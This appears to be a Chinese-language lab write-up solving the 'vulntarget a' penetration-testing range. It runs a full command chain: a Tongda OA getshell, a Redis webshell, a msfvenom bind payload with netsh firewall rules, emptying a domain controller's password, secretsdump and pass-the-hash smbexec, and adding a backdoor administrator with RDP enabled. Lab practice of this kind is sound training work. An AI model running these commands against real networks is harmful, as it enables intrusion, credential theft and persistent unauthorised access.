vulntarget a

常规操作，先扫

，web端口，rpc，和445开放，看看web

通达oa，工具尝试getshell

cs上线

挂代理走一波,发现就一个hello world，扫一下

扫到这个，暂时留着，nmap扫一下，发现开启了6379，也就是redis，直接连

参考文章：Redis Getshell方法总结 – 天下大木头 (wjlshare.com)

用绝对路径写shell

访问c.php

发现仍是system权限。

查看是否在域内

查看域管理员

ping一下，获得ip

剩下就没啥了，还是直接上cs。

急了，cs第二层怎么都挂不上，急了，换msf

生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=8091 -f exe > 8091_bind.exe

关闭服务器防火墙

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow

msf开启监听。

拿到第二台主机的msf，获得密码

添加一下路由，ip之前就知道了，主要是后续代理挂不上了，，，

run post/windows/manage/migrate

run post/multi/manage/autoroute

然后利用漏洞把密码制空

然后dump出来impacket/secretsdump.py at master · SecureAuthCorp/impacket (github.com)

proxychains python3 secretsdump.py vulntarget.com/win2019\$@10.0.10.110 -no-pass

msf开启代理

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

然后利用smbexec，拿到shell

proxychains python3 smbexec.py  -hashes ad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 vulntarget.com/administrator@10.0.10.110

创建新用户，然后开远程桌面

net user snowywar Admin@123 /add
命令成功完成。


C:\Windows\system32>net localgroup administrators snowywar/add
命令成功完成。

reg add "HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

还是一样，上传木马然后转shell监听到msf内即可，还有关闭防火墙

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow

最后拿下三台主机，通关